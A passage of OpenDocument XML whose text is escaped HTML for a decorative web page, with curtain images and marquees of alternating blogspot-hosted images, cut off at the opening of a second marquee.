      <text:p text:style-name="P1"><text:span text:style-name="T2272">&lt;div class="leftcurtain"&gt;&lt;img src="https://</text:span><text:span text:style-name="T2273">2</text:span><text:span text:style-name="T2274">.bp.blogspot.com/-</text:span><text:span text:style-name="T2275">8</text:span><text:span text:style-name="T2276">fWT</text:span><text:span text:style-name="T2277">2</text:span><text:span text:style-name="T2278">NvB</text:span><text:span text:style-name="T2279">4</text:span><text:span text:style-name="T2280">GE/XeeHG</text:span><text:span text:style-name="T2281">5</text:span><text:span text:style-name="T2282">wZHgI/AAAAAAAAAKk/VThU</text:span><text:span text:style-name="T2283">3</text:span><text:span text:style-name="T2284">ulRqO</text:span><text:span text:style-name="T2285">0</text:span><text:span text:style-name="T2286">PVgnADqCARLORACu</text:span><text:span text:style-name="T2287">8</text:span><text:span text:style-name="T2288">kMaBgCLcBGAsYHQ/s</text:span><text:span text:style-name="T2289">1600</text:span><text:span text:style-name="T2290">/curtain</text:span><text:span text:style-name="T2291">5</text:span><text:span text:style-name="T2292">.jpg"&gt;&lt;/div&gt;</text:span><text:span text:style-name="T2293"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T2293"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T2294">&lt;div class="rightcurtain"&gt;&lt;img src="https://</text:span><text:span text:style-name="T2295">2</text:span><text:span text:style-name="T2296">.bp.blogspot.com/-</text:span><text:span text:style-name="T2297">8</text:span><text:span text:style-name="T2298">fWT</text:span><text:span text:style-name="T2299">2</text:span><text:span text:style-name="T2300">NvB</text:span><text:span text:style-name="T2301">4</text:span><text:span text:style-name="T2302">GE/XeeHG</text:span><text:span text:style-name="T2303">5</text:span><text:span text:style-name="T2304">wZHgI/AAAAAAAAAKk/VThU</text:span><text:span text:style-name="T2305">3</text:span><text:span text:style-name="T2306">ulRqO</text:span><text:span text:style-name="T2307">0</text:span><text:span text:style-name="T2308">PVgnADqCARLORACu</text:span><text:span text:style-name="T2309">8</text:span><text:span text:style-name="T2310">kMaBgCLcBGAsYHQ/s</text:span><text:span text:style-name="T2311">1600</text:span><text:span text:style-name="T2312">/curtain</text:span><text:span text:style-name="T2313">5</text:span><text:span text:style-name="T2314">.jpg"&gt;&lt;/div&gt;</text:span><text:span text:style-name="T2315"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T2316">&lt;/div&gt;</text:span><text:span text:style-name="T2317"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T2317"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T2317"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T2317"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T2318">&lt;marquee class="wb</text:span><text:span text:style-name="T2319">1</text:span><text:span text:style-name="T2320">" behavior="scroll" direction="up" scrolldelay="</text:span><text:span text:style-name="T2321">5</text:span><text:span text:style-name="T2322">"&gt;&lt;img src="https://</text:span><text:span text:style-name="T2323">1</text:span><text:span text:style-name="T2324">.bp.blogspot.com/-I</text:span><text:span text:style-name="T2325">79</text:span><text:span text:style-name="T2326">F</text:span><text:span text:style-name="T2327">0</text:span><text:span text:style-name="T2328">H</text:span><text:span text:style-name="T2329">9</text:span><text:span text:style-name="T2330">ZsPg/W</text:span><text:span text:style-name="T2331">1</text:span><text:span text:style-name="T2332">R</text:span><text:span text:style-name="T2333">1</text:span><text:span text:style-name="T2334">ufZS-</text:span><text:span text:style-name="T2335">2</text:span><text:span text:style-name="T2336">I/AAAAAAAABzA/IlPB_mELkyEt</text:span><text:span text:style-name="T2337">6</text:span><text:span text:style-name="T2338">CMrX</text:span><text:span text:style-name="T2339">784</text:span><text:span text:style-name="T2340">WTsVl</text:span><text:span text:style-name="T2341">7</text:span><text:span text:style-name="T2342">L</text:span><text:span text:style-name="T2343">2</text:span><text:span text:style-name="T2344">xvbOQCLcBGAs/s</text:span><text:span text:style-name="T2345">1600</text:span><text:span text:style-name="T2346">/b.png" height="</text:span><text:span text:style-name="T2347">129</text:span><text:span text:style-name="T2348">px" width="</text:span><text:span text:style-name="T2349">35</text:span><text:span text:style-name="T2350">px"/&gt;&lt;br&gt;&lt;br&gt;</text:span><text:span text:style-name="T2351"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T2352">&lt;img src="https://</text:span><text:span text:style-name="T2353">4</text:span><text:span text:style-name="T2354">.bp.blogspot.com/-uRNrOzmisfk/W</text:span><text:span text:style-name="T2355">1</text:span><text:span text:style-name="T2356">R</text:span><text:span text:style-name="T2357">1</text:span><text:span text:style-name="T2358">uj</text:span><text:span text:style-name="T2359">9</text:span><text:span text:style-name="T2360">XpRI/AAAAAAAABzE/pSZVxDvorcg</text:span><text:span text:style-name="T2361">5</text:span><text:span text:style-name="T2362">kQfyUps</text:span><text:span text:style-name="T2363">6</text:span><text:span text:style-name="T2364">VGgerj</text:span><text:span text:style-name="T2365">8</text:span><text:span text:style-name="T2366">aQpkUACLcBGAs/s</text:span><text:span text:style-name="T2367">1600</text:span><text:span text:style-name="T2368">/a.png" height="</text:span><text:span text:style-name="T2369">129</text:span><text:span text:style-name="T2370">px" width="</text:span><text:span text:style-name="T2371">35</text:span><text:span text:style-name="T2372">px"/&gt;&lt;br&gt;&lt;br&gt;</text:span><text:span text:style-name="T2373"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T2374">&lt;img src="https://</text:span><text:span text:style-name="T2375">1</text:span><text:span text:style-name="T2376">.bp.blogspot.com/-I</text:span><text:span text:style-name="T2377">79</text:span><text:span text:style-name="T2378">F</text:span><text:span text:style-name="T2379">0</text:span><text:span text:style-name="T2380">H</text:span><text:span text:style-name="T2381">9</text:span><text:span text:style-name="T2382">ZsPg/W</text:span><text:span text:style-name="T2383">1</text:span><text:span text:style-name="T2384">R</text:span><text:span text:style-name="T2385">1</text:span><text:span text:style-name="T2386">ufZS-</text:span><text:span text:style-name="T2387">2</text:span><text:span text:style-name="T2388">I/AAAAAAAABzA/IlPB_mELkyEt</text:span><text:span text:style-name="T2389">6</text:span><text:span text:style-name="T2390">CMrX</text:span><text:span text:style-name="T2391">784</text:span><text:span text:style-name="T2392">WTsVl</text:span><text:span text:style-name="T2393">7</text:span><text:span text:style-name="T2394">L</text:span><text:span text:style-name="T2395">2</text:span><text:span text:style-name="T2396">xvbOQCLcBGAs/s</text:span><text:span text:style-name="T2397">1600</text:span><text:span text:style-name="T2398">/b.png" height="</text:span><text:span text:style-name="T2399">129</text:span><text:span text:style-name="T2400">px" width="</text:span><text:span text:style-name="T2401">35</text:span><text:span text:style-name="T2402">px"/&gt;&lt;br&gt;&lt;br&gt;</text:span><text:span text:style-name="T2403"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T2404">&lt;img src="https://</text:span><text:span text:style-name="T2405">4</text:span><text:span text:style-name="T2406">.bp.blogspot.com/-uRNrOzmisfk/W</text:span><text:span text:style-name="T2407">1</text:span><text:span text:style-name="T2408">R</text:span><text:span text:style-name="T2409">1</text:span><text:span text:style-name="T2410">uj</text:span><text:span text:style-name="T2411">9</text:span><text:span text:style-name="T2412">XpRI/AAAAAAAABzE/pSZVxDvorcg</text:span><text:span text:style-name="T2413">5</text:span><text:span text:style-name="T2414">kQfyUps</text:span><text:span text:style-name="T2415">6</text:span><text:span text:style-name="T2416">VGgerj</text:span><text:span text:style-name="T2417">8</text:span><text:span text:style-name="T2418">aQpkUACLcBGAs/s</text:span><text:span text:style-name="T2419">1600</text:span><text:span text:style-name="T2420">/a.png" height="</text:span><text:span text:style-name="T2421">129</text:span><text:span text:style-name="T2422">px" width="</text:span><text:span text:style-name="T2423">35</text:span><text:span text:style-name="T2424">px"/&gt;&lt;br&gt;&lt;br&gt;</text:span><text:span text:style-name="T2425"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T2426">&lt;img src="https://</text:span><text:span text:style-name="T2427">1</text:span><text:span text:style-name="T2428">.bp.blogspot.com/-I</text:span><text:span text:style-name="T2429">79</text:span><text:span text:style-name="T2430">F</text:span><text:span text:style-name="T2431">0</text:span><text:span text:style-name="T2432">H</text:span><text:span text:style-name="T2433">9</text:span><text:span text:style-name="T2434">ZsPg/W</text:span><text:span text:style-name="T2435">1</text:span><text:span text:style-name="T2436">R</text:span><text:span text:style-name="T2437">1</text:span><text:span text:style-name="T2438">ufZS-</text:span><text:span text:style-name="T2439">2</text:span><text:span text:style-name="T2440">I/AAAAAAAABzA/IlPB_mELkyEt</text:span><text:span text:style-name="T2441">6</text:span><text:span text:style-name="T2442">CMrX</text:span><text:span text:style-name="T2443">784</text:span><text:span text:style-name="T2444">WTsVl</text:span><text:span text:style-name="T2445">7</text:span><text:span text:style-name="T2446">L</text:span><text:span text:style-name="T2447">2</text:span><text:span text:style-name="T2448">xvbOQCLcBGAs/s</text:span><text:span text:style-name="T2449">1600</text:span><text:span text:style-name="T2450">/b.png" height="</text:span><text:span text:style-name="T2451">129</text:span><text:span text:style-name="T2452">px" width="</text:span><text:span text:style-name="T2453">35</text:span><text:span text:style-name="T2454">px"/&gt;&lt;br&gt;&lt;br&gt;</text:span><text:span text:style-name="T2455"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T2456">&lt;img src="https://</text:span><text:span text:style-name="T2457">4</text:span><text:span text:style-name="T2458">.bp.blogspot.com/-uRNrOzmisfk/W</text:span><text:span text:style-name="T2459">1</text:span><text:span text:style-name="T2460">R</text:span><text:span text:style-name="T2461">1</text:span><text:span text:style-name="T2462">uj</text:span><text:span text:style-name="T2463">9</text:span><text:span text:style-name="T2464">XpRI/AAAAAAAABzE/pSZVxDvorcg</text:span><text:span text:style-name="T2465">5</text:span><text:span text:style-name="T2466">kQfyUps</text:span><text:span text:style-name="T2467">6</text:span><text:span text:style-name="T2468">VGgerj</text:span><text:span text:style-name="T2469">8</text:span><text:span text:style-name="T2470">aQpkUACLcBGAs/s</text:span><text:span text:style-name="T2471">1600</text:span><text:span text:style-name="T2472">/a.png" height="</text:span><text:span text:style-name="T2473">129</text:span><text:span text:style-name="T2474">px" width="</text:span><text:span text:style-name="T2475">35</text:span><text:span text:style-name="T2476">px"/&gt;&lt;br&gt;&lt;br&gt;</text:span><text:span text:style-name="T2477"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T2478">&lt;img src="https://</text:span><text:span text:style-name="T2479">1</text:span><text:span text:style-name="T2480">.bp.blogspot.com/-I</text:span><text:span text:style-name="T2481">79</text:span><text:span text:style-name="T2482">F</text:span><text:span text:style-name="T2483">0</text:span><text:span text:style-name="T2484">H</text:span><text:span text:style-name="T2485">9</text:span><text:span text:style-name="T2486">ZsPg/W</text:span><text:span text:style-name="T2487">1</text:span><text:span text:style-name="T2488">R</text:span><text:span text:style-name="T2489">1</text:span><text:span text:style-name="T2490">ufZS-</text:span><text:span text:style-name="T2491">2</text:span><text:span text:style-name="T2492">I/AAAAAAAABzA/IlPB_mELkyEt</text:span><text:span text:style-name="T2493">6</text:span><text:span text:style-name="T2494">CMrX</text:span><text:span text:style-name="T2495">784</text:span><text:span text:style-name="T2496">WTsVl</text:span><text:span text:style-name="T2497">7</text:span><text:span text:style-name="T2498">L</text:span><text:span text:style-name="T2499">2</text:span><text:span text:style-name="T2500">xvbOQCLcBGAs/s</text:span><text:span text:style-name="T2501">1600</text:span><text:span text:style-name="T2502">/b.png" height="</text:span><text:span text:style-name="T2503">129</text:span><text:span text:style-name="T2504">px" width="</text:span><text:span text:style-name="T2505">35</text:span><text:span text:style-name="T2506">px"/&gt;&lt;br&gt;&lt;br&gt;</text:span><text:span text:style-name="T2507"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T2508">&lt;img src="https://</text:span><text:span text:style-name="T2509">4</text:span><text:span text:style-name="T2510">.bp.blogspot.com/-uRNrOzmisfk/W</text:span><text:span text:style-name="T2511">1</text:span><text:span text:style-name="T2512">R</text:span><text:span text:style-name="T2513">1</text:span><text:span text:style-name="T2514">uj</text:span><text:span text:style-name="T2515">9</text:span><text:span text:style-name="T2516">XpRI/AAAAAAAABzE/pSZVxDvorcg</text:span><text:span text:style-name="T2517">5</text:span><text:span text:style-name="T2518">kQfyUps</text:span><text:span text:style-name="T2519">6</text:span><text:span text:style-name="T2520">VGgerj</text:span><text:span text:style-name="T2521">8</text:span><text:span text:style-name="T2522">aQpkUACLcBGAs/s</text:span><text:span text:style-name="T2523">1600</text:span><text:span text:style-name="T2524">/a.png" height="</text:span><text:span text:style-name="T2525">129</text:span><text:span text:style-name="T2526">px" width="</text:span><text:span text:style-name="T2527">35</text:span><text:span text:style-name="T2528">px"/&gt;&lt;br&gt;&lt;br&gt;</text:span><text:span text:style-name="T2529"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T2530">&lt;img src="https://</text:span><text:span text:style-name="T2531">1</text:span><text:span text:style-name="T2532">.bp.blogspot.com/-I</text:span><text:span text:style-name="T2533">79</text:span><text:span text:style-name="T2534">F</text:span><text:span text:style-name="T2535">0</text:span><text:span text:style-name="T2536">H</text:span><text:span text:style-name="T2537">9</text:span><text:span text:style-name="T2538">ZsPg/W</text:span><text:span text:style-name="T2539">1</text:span><text:span text:style-name="T2540">R</text:span><text:span text:style-name="T2541">1</text:span><text:span text:style-name="T2542">ufZS-</text:span><text:span text:style-name="T2543">2</text:span><text:span text:style-name="T2544">I/AAAAAAAABzA/IlPB_mELkyEt</text:span><text:span text:style-name="T2545">6</text:span><text:span text:style-name="T2546">CMrX</text:span><text:span text:style-name="T2547">784</text:span><text:span text:style-name="T2548">WTsVl</text:span><text:span text:style-name="T2549">7</text:span><text:span text:style-name="T2550">L</text:span><text:span text:style-name="T2551">2</text:span><text:span text:style-name="T2552">xvbOQCLcBGAs/s</text:span><text:span text:style-name="T2553">1600</text:span><text:span text:style-name="T2554">/b.png" height="</text:span><text:span text:style-name="T2555">129</text:span><text:span text:style-name="T2556">px" width="</text:span><text:span text:style-name="T2557">35</text:span><text:span text:style-name="T2558">px"/&gt;&lt;br&gt;&lt;br&gt;</text:span><text:span text:style-name="T2559"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T2560">&lt;img src="https://</text:span><text:span text:style-name="T2561">4</text:span><text:span text:style-name="T2562">.bp.blogspot.com/-uRNrOzmisfk/W</text:span><text:span text:style-name="T2563">1</text:span><text:span text:style-name="T2564">R</text:span><text:span text:style-name="T2565">1</text:span><text:span text:style-name="T2566">uj</text:span><text:span text:style-name="T2567">9</text:span><text:span text:style-name="T2568">XpRI/AAAAAAAABzE/pSZVxDvorcg</text:span><text:span text:style-name="T2569">5</text:span><text:span text:style-name="T2570">kQfyUps</text:span><text:span text:style-name="T2571">6</text:span><text:span text:style-name="T2572">VGgerj</text:span><text:span text:style-name="T2573">8</text:span><text:span text:style-name="T2574">aQpkUACLcBGAs/s</text:span><text:span text:style-name="T2575">1600</text:span><text:span text:style-name="T2576">/a.png" height="</text:span><text:span text:style-name="T2577">129</text:span><text:span text:style-name="T2578">px" width="</text:span><text:span text:style-name="T2579">35</text:span><text:span text:style-name="T2580">px"/&gt;&lt;br&gt;&lt;br&gt;</text:span><text:span text:style-name="T2581"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T2582">&lt;img src="https://</text:span><text:span text:style-name="T2583">1</text:span><text:span text:style-name="T2584">.bp.blogspot.com/-I</text:span><text:span text:style-name="T2585">79</text:span><text:span text:style-name="T2586">F</text:span><text:span text:style-name="T2587">0</text:span><text:span text:style-name="T2588">H</text:span><text:span text:style-name="T2589">9</text:span><text:span text:style-name="T2590">ZsPg/W</text:span><text:span text:style-name="T2591">1</text:span><text:span text:style-name="T2592">R</text:span><text:span text:style-name="T2593">1</text:span><text:span text:style-name="T2594">ufZS-</text:span><text:span text:style-name="T2595">2</text:span><text:span text:style-name="T2596">I/AAAAAAAABzA/IlPB_mELkyEt</text:span><text:span text:style-name="T2597">6</text:span><text:span text:style-name="T2598">CMrX</text:span><text:span text:style-name="T2599">784</text:span><text:span text:style-name="T2600">WTsVl</text:span><text:span text:style-name="T2601">7</text:span><text:span text:style-name="T2602">L</text:span><text:span text:style-name="T2603">2</text:span><text:span text:style-name="T2604">xvbOQCLcBGAs/s</text:span><text:span text:style-name="T2605">1600</text:span><text:span text:style-name="T2606">/b.png" height="</text:span><text:span text:style-name="T2607">129</text:span><text:span text:style-name="T2608">px" width="</text:span><text:span text:style-name="T2609">35</text:span><text:span text:style-name="T2610">px"/&gt;&lt;br&gt;&lt;br&gt;</text:span><text:span text:style-name="T2611"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T2612">&lt;img src="https://</text:span><text:span text:style-name="T2613">4</text:span><text:span text:style-name="T2614">.bp.blogspot.com/-uRNrOzmisfk/W</text:span><text:span text:style-name="T2615">1</text:span><text:span text:style-name="T2616">R</text:span><text:span text:style-name="T2617">1</text:span><text:span text:style-name="T2618">uj</text:span><text:span text:style-name="T2619">9</text:span><text:span text:style-name="T2620">XpRI/AAAAAAAABzE/pSZVxDvorcg</text:span><text:span text:style-name="T2621">5</text:span><text:span text:style-name="T2622">kQfyUps</text:span><text:span text:style-name="T2623">6</text:span><text:span text:style-name="T2624">VGgerj</text:span><text:span text:style-name="T2625">8</text:span><text:span text:style-name="T2626">aQpkUACLcBGAs/s</text:span><text:span text:style-name="T2627">1600</text:span><text:span text:style-name="T2628">/a.png" height="</text:span><text:span text:style-name="T2629">129</text:span><text:span text:style-name="T2630">px" width="</text:span><text:span text:style-name="T2631">35</text:span><text:span text:style-name="T2632">px"/&gt;&lt;br&gt;&lt;br&gt;</text:span><text:span text:style-name="T2633"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T2634">&lt;img src="https://</text:span><text:span text:style-name="T2635">1</text:span><text:span text:style-name="T2636">.bp.blogspot.com/-I</text:span><text:span text:style-name="T2637">79</text:span><text:span text:style-name="T2638">F</text:span><text:span text:style-name="T2639">0</text:span><text:span text:style-name="T2640">H</text:span><text:span text:style-name="T2641">9</text:span><text:span text:style-name="T2642">ZsPg/W</text:span><text:span text:style-name="T2643">1</text:span><text:span text:style-name="T2644">R</text:span><text:span text:style-name="T2645">1</text:span><text:span text:style-name="T2646">ufZS-</text:span><text:span text:style-name="T2647">2</text:span><text:span text:style-name="T2648">I/AAAAAAAABzA/IlPB_mELkyEt</text:span><text:span text:style-name="T2649">6</text:span><text:span text:style-name="T2650">CMrX</text:span><text:span text:style-name="T2651">784</text:span><text:span text:style-name="T2652">WTsVl</text:span><text:span text:style-name="T2653">7</text:span><text:span text:style-name="T2654">L</text:span><text:span text:style-name="T2655">2</text:span><text:span text:style-name="T2656">xvbOQCLcBGAs/s</text:span><text:span text:style-name="T2657">1600</text:span><text:span text:style-name="T2658">/b.png" height="</text:span><text:span text:style-name="T2659">129</text:span><text:span text:style-name="T2660">px" width="</text:span><text:span text:style-name="T2661">35</text:span><text:span text:style-name="T2662">px"/&gt;&lt;br&gt;&lt;br&gt;</text:span><text:span text:style-name="T2663"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T2664">&lt;img src="https://</text:span><text:span text:style-name="T2665">4</text:span><text:span text:style-name="T2666">.bp.blogspot.com/-uRNrOzmisfk/W</text:span><text:span text:style-name="T2667">1</text:span><text:span text:style-name="T2668">R</text:span><text:span text:style-name="T2669">1</text:span><text:span text:style-name="T2670">uj</text:span><text:span text:style-name="T2671">9</text:span><text:span text:style-name="T2672">XpRI/AAAAAAAABzE/pSZVxDvorcg</text:span><text:span text:style-name="T2673">5</text:span><text:span text:style-name="T2674">kQfyUps</text:span><text:span text:style-name="T2675">6</text:span><text:span text:style-name="T2676">VGgerj</text:span><text:span text:style-name="T2677">8</text:span><text:span text:style-name="T2678">aQpkUACLcBGAs/s</text:span><text:span text:style-name="T2679">1600</text:span><text:span text:style-name="T2680">/a.png" height="</text:span><text:span text:style-name="T2681">129</text:span><text:span text:style-name="T2682">px" width="</text:span><text:span text:style-name="T2683">35</text:span><text:span text:style-name="T2684">px"/&gt;&lt;br&gt;&lt;br&gt;</text:span><text:span text:style-name="T2685"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T2686">&lt;img src="https://</text:span><text:span text:style-name="T2687">1</text:span><text:span text:style-name="T2688">.bp.blogspot.com/-I</text:span><text:span text:style-name="T2689">79</text:span><text:span text:style-name="T2690">F</text:span><text:span text:style-name="T2691">0</text:span><text:span text:style-name="T2692">H</text:span><text:span text:style-name="T2693">9</text:span><text:span text:style-name="T2694">ZsPg/W</text:span><text:span text:style-name="T2695">1</text:span><text:span text:style-name="T2696">R</text:span><text:span text:style-name="T2697">1</text:span><text:span text:style-name="T2698">ufZS-</text:span><text:span text:style-name="T2699">2</text:span><text:span text:style-name="T2700">I/AAAAAAAABzA/IlPB_mELkyEt</text:span><text:span text:style-name="T2701">6</text:span><text:span text:style-name="T2702">CMrX</text:span><text:span text:style-name="T2703">784</text:span><text:span text:style-name="T2704">WTsVl</text:span><text:span text:style-name="T2705">7</text:span><text:span text:style-name="T2706">L</text:span><text:span text:style-name="T2707">2</text:span><text:span text:style-name="T2708">xvbOQCLcBGAs/s</text:span><text:span text:style-name="T2709">1600</text:span><text:span text:style-name="T2710">/b.png" height="</text:span><text:span text:style-name="T2711">129</text:span><text:span text:style-name="T2712">px" width="</text:span><text:span text:style-name="T2713">35</text:span><text:span text:style-name="T2714">px"/&gt;&lt;br&gt;&lt;br&gt;</text:span><text:span text:style-name="T2715"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T2716">&lt;img src="https://</text:span><text:span text:style-name="T2717">4</text:span><text:span text:style-name="T2718">.bp.blogspot.com/-uRNrOzmisfk/W</text:span><text:span text:style-name="T2719">1</text:span><text:span text:style-name="T2720">R</text:span><text:span text:style-name="T2721">1</text:span><text:span text:style-name="T2722">uj</text:span><text:span text:style-name="T2723">9</text:span><text:span text:style-name="T2724">XpRI/AAAAAAAABzE/pSZVxDvorcg</text:span><text:span text:style-name="T2725">5</text:span><text:span text:style-name="T2726">kQfyUps</text:span><text:span text:style-name="T2727">6</text:span><text:span text:style-name="T2728">VGgerj</text:span><text:span text:style-name="T2729">8</text:span><text:span text:style-name="T2730">aQpkUACLcBGAs/s</text:span><text:span text:style-name="T2731">1600</text:span><text:span text:style-name="T2732">/a.png" height="</text:span><text:span text:style-name="T2733">129</text:span><text:span text:style-name="T2734">px" width="</text:span><text:span text:style-name="T2735">35</text:span><text:span text:style-name="T2736">px"/&gt;&lt;br&gt;&lt;br&gt;</text:span><text:span text:style-name="T2737"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T2738">&lt;img src="https://</text:span><text:span text:style-name="T2739">1</text:span><text:span text:style-name="T2740">.bp.blogspot.com/-I</text:span><text:span text:style-name="T2741">79</text:span><text:span text:style-name="T2742">F</text:span><text:span text:style-name="T2743">0</text:span><text:span text:style-name="T2744">H</text:span><text:span text:style-name="T2745">9</text:span><text:span text:style-name="T2746">ZsPg/W</text:span><text:span text:style-name="T2747">1</text:span><text:span text:style-name="T2748">R</text:span><text:span text:style-name="T2749">1</text:span><text:span text:style-name="T2750">ufZS-</text:span><text:span text:style-name="T2751">2</text:span><text:span text:style-name="T2752">I/AAAAAAAABzA/IlPB_mELkyEt</text:span><text:span text:style-name="T2753">6</text:span><text:span text:style-name="T2754">CMrX</text:span><text:span text:style-name="T2755">784</text:span><text:span text:style-name="T2756">WTsVl</text:span><text:span text:style-name="T2757">7</text:span><text:span text:style-name="T2758">L</text:span><text:span text:style-name="T2759">2</text:span><text:span text:style-name="T2760">xvbOQCLcBGAs/s</text:span><text:span text:style-name="T2761">1600</text:span><text:span text:style-name="T2762">/b.png" height="</text:span><text:span text:style-name="T2763">129</text:span><text:span text:style-name="T2764">px" width="</text:span><text:span text:style-name="T2765">35</text:span><text:span text:style-name="T2766">px"/&gt;&lt;br&gt;&lt;br&gt;</text:span><text:span text:style-name="T2767"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T2768">&lt;img src="https://</text:span><text:span text:style-name="T2769">4</text:span><text:span text:style-name="T2770">.bp.blogspot.com/-uRNrOzmisfk/W</text:span><text:span text:style-name="T2771">1</text:span><text:span text:style-name="T2772">R</text:span><text:span text:style-name="T2773">1</text:span><text:span text:style-name="T2774">uj</text:span><text:span text:style-name="T2775">9</text:span><text:span text:style-name="T2776">XpRI/AAAAAAAABzE/pSZVxDvorcg</text:span><text:span text:style-name="T2777">5</text:span><text:span text:style-name="T2778">kQfyUps</text:span><text:span text:style-name="T2779">6</text:span><text:span text:style-name="T2780">VGgerj</text:span><text:span text:style-name="T2781">8</text:span><text:span text:style-name="T2782">aQpkUACLcBGAs/s</text:span><text:span text:style-name="T2783">1600</text:span><text:span text:style-name="T2784">/a.png" height="</text:span><text:span text:style-name="T2785">129</text:span><text:span text:style-name="T2786">px" width="</text:span><text:span text:style-name="T2787">35</text:span><text:span text:style-name="T2788">px"/&gt;&lt;br&gt;&lt;br&gt;</text:span><text:span text:style-name="T2789"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T2790">&lt;img src="https://</text:span><text:span text:style-name="T2791">1</text:span><text:span text:style-name="T2792">.bp.blogspot.com/-I</text:span><text:span text:style-name="T2793">79</text:span><text:span text:style-name="T2794">F</text:span><text:span text:style-name="T2795">0</text:span><text:span text:style-name="T2796">H</text:span><text:span text:style-name="T2797">9</text:span><text:span text:style-name="T2798">ZsPg/W</text:span><text:span text:style-name="T2799">1</text:span><text:span text:style-name="T2800">R</text:span><text:span text:style-name="T2801">1</text:span><text:span text:style-name="T2802">ufZS-</text:span><text:span text:style-name="T2803">2</text:span><text:span text:style-name="T2804">I/AAAAAAAABzA/IlPB_mELkyEt</text:span><text:span text:style-name="T2805">6</text:span><text:span text:style-name="T2806">CMrX</text:span><text:span text:style-name="T2807">784</text:span><text:span text:style-name="T2808">WTsVl</text:span><text:span text:style-name="T2809">7</text:span><text:span text:style-name="T2810">L</text:span><text:span text:style-name="T2811">2</text:span><text:span text:style-name="T2812">xvbOQCLcBGAs/s</text:span><text:span text:style-name="T2813">1600</text:span><text:span text:style-name="T2814">/b.png" height="</text:span><text:span text:style-name="T2815">129</text:span><text:span text:style-name="T2816">px" width="</text:span><text:span text:style-name="T2817">35</text:span><text:span text:style-name="T2818">px"/&gt;&lt;br&gt;&lt;br&gt;</text:span><text:span text:style-name="T2819"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T2820">&lt;img src="https://</text:span><text:span text:style-name="T2821">4</text:span><text:span text:style-name="T2822">.bp.blogspot.com/-uRNrOzmisfk/W</text:span><text:span text:style-name="T2823">1</text:span><text:span text:style-name="T2824">R</text:span><text:span text:style-name="T2825">1</text:span><text:span text:style-name="T2826">uj</text:span><text:span text:style-name="T2827">9</text:span><text:span text:style-name="T2828">XpRI/AAAAAAAABzE/pSZVxDvorcg</text:span><text:span text:style-name="T2829">5</text:span><text:span text:style-name="T2830">kQfyUps</text:span><text:span text:style-name="T2831">6</text:span><text:span text:style-name="T2832">VGgerj</text:span><text:span text:style-name="T2833">8</text:span><text:span text:style-name="T2834">aQpkUACLcBGAs/s</text:span><text:span text:style-name="T2835">1600</text:span><text:span text:style-name="T2836">/a.png" height="</text:span><text:span text:style-name="T2837">129</text:span><text:span text:style-name="T2838">px" width="</text:span><text:span text:style-name="T2839">35</text:span><text:span text:style-name="T2840">px"/&gt;&lt;br&gt;&lt;br&gt;</text:span><text:span text:style-name="T2841"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T2842">&lt;img src="https://</text:span><text:span text:style-name="T2843">1</text:span><text:span text:style-name="T2844">.bp.blogspot.com/-I</text:span><text:span text:style-name="T2845">79</text:span><text:span text:style-name="T2846">F</text:span><text:span text:style-name="T2847">0</text:span><text:span text:style-name="T2848">H</text:span><text:span text:style-name="T2849">9</text:span><text:span text:style-name="T2850">ZsPg/W</text:span><text:span text:style-name="T2851">1</text:span><text:span text:style-name="T2852">R</text:span><text:span text:style-name="T2853">1</text:span><text:span text:style-name="T2854">ufZS-</text:span><text:span text:style-name="T2855">2</text:span><text:span text:style-name="T2856">I/AAAAAAAABzA/IlPB_mELkyEt</text:span><text:span text:style-name="T2857">6</text:span><text:span text:style-name="T2858">CMrX</text:span><text:span text:style-name="T2859">784</text:span><text:span text:style-name="T2860">WTsVl</text:span><text:span text:style-name="T2861">7</text:span><text:span text:style-name="T2862">L</text:span><text:span text:style-name="T2863">2</text:span><text:span text:style-name="T2864">xvbOQCLcBGAs/s</text:span><text:span text:style-name="T2865">1600</text:span><text:span text:style-name="T2866">/b.png" height="</text:span><text:span text:style-name="T2867">129</text:span><text:span text:style-name="T2868">px" width="</text:span><text:span text:style-name="T2869">35</text:span><text:span text:style-name="T2870">px"/&gt;&lt;br&gt;&lt;br&gt;</text:span><text:span text:style-name="T2871"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T2872">&lt;/marquee&gt;</text:span><text:span text:style-name="T2873"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T2873"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T2874">&lt;marquee class="wb</text:span><text:span text:style-name="T2875">2</text:span><text:span text:style-name="T2876">" behavior="scroll" direction="down" scrolldelay="</text:span><text:span text:style-name="T2877">5</text:span><text:span text:style-name="T2878">"&gt;&lt;br&gt;</text:span><text:span text:style-name="T2879"/></text:p>
